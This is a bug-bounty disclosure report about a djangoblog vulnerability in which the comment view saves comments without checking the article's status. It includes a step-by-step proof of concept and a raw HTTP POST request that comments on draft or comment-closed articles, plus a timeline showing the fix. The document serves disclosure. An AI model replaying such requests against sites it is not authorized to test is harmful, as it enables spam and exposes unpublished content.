Improper Access Control in liangliangyy/djangoblog

Valid

Reported on

Feb 13th 2022

Description

"form_valid" function in comments/views.py file performs the task of saving user comments. However, this function doesn't check the status of article, so users can leave comments on draft article or public article with commentstatus is off.

Proof of Concept

  • Step 1: Login as admin in test product and go to http://localhost:8000/admin/blog/article/. Change status of article ID 19 to draft_article (选中文章设置为草稿) or close_article_commentstatus (关闭文章评论)
  • Step 2: Login as normal user (http://localhost:8000/login) and get valid csrftoken, sessionid, csrfmiddlewaretoken.
  • Step 3: Call request and create comment in draft article or public article with commentstatus is off
POST /article/19/postcomment HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 181
Origin: http://127.0.0.1:8000
DNT: 1
Connection: close
Cookie: csrftoken=2iccWTWyKBM4cm0Ii6BkrTOJ2xNdMox6JUP1zlchmG6eUJSkOCXgklgJwuuih5ia; sessionid=pg009zo7zl35ssyk4fsufv64wplpldp9
Upgrade-Insecure-Requests: 1

csrfmiddlewaretoken=8uHhc1GS64fgzOap298PemIde25fymtrP6k6PtWBI9zqhb21yFuL7OadIZMk33ev&body=comment_in_post_19_disabled&parent_comment_id=&submit=%E5%8F%91%E8%A1%A8%E8%AF%84%E8%AE%BA

  • Step 4: In admin browser, go to http://localhost:8000/admin/comments/comment/ and check result.

  • PoC:

Comment in article disabled: https://drive.google.com/file/d/1nD-lbe1aDxATfvJNyX5R81x2aH_4nddl/view?usp=sharing

Send comment: https://drive.google.com/file/d/1wJMdUxhTAB1OGR9pJNG1qayZGcMl_quM/view?usp=sharing

Result: https://drive.google.com/file/d/1ODJRC3SL2rV0dnOdQRLaa_7x9rG0S3zd/view?usp=sharing

Impact

Normal users can leave comments on draft article or public article with commentstatus is off. Attacker can also take advantage of the vulnerability to list the id of articles in draft mode. Run comment spam attack even if the app has disabled comments for all articles.

Occurrences

We are processing your report and will contact the liangliangyy/djangoblog team within 24 hours. a year ago
且听风吟 validated this vulnerability a year ago
nhiephon has been awarded the disclosure bounty
The fix bounty is now up for grabs
且听风吟 marked this as fixed in master with commit 6512ab a year ago
且听风吟 has been awarded the fix bounty
This vulnerability will not receive a CVE
views.py#L36 has been validated
to join this conversation